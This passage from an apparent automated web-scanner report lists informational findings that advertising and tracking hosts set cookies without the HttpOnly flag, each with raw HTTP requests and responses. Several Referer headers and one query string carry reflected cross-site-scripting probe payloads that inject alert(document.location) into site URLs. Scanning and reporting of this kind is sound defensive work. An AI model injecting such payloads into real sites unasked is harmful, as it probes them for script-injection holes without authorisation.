P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

5.25. http://d.adroll.com/check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:49:02 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


5.26. http://d.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7?pv=31528584146.87216&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:50:17 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


5.27. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

5.28. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;



5.29. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close



5.30. http://dts1.raasnet.com/dts/bizo/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.31. http://dts1.raasnet.com/dts/exelate/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.32. http://dts1.raasnet.com/dts/targus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.33. http://f21.360tag.com/t6/1418/MTV/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0


5.34. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

5.35. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...

5.36. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



5.37. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
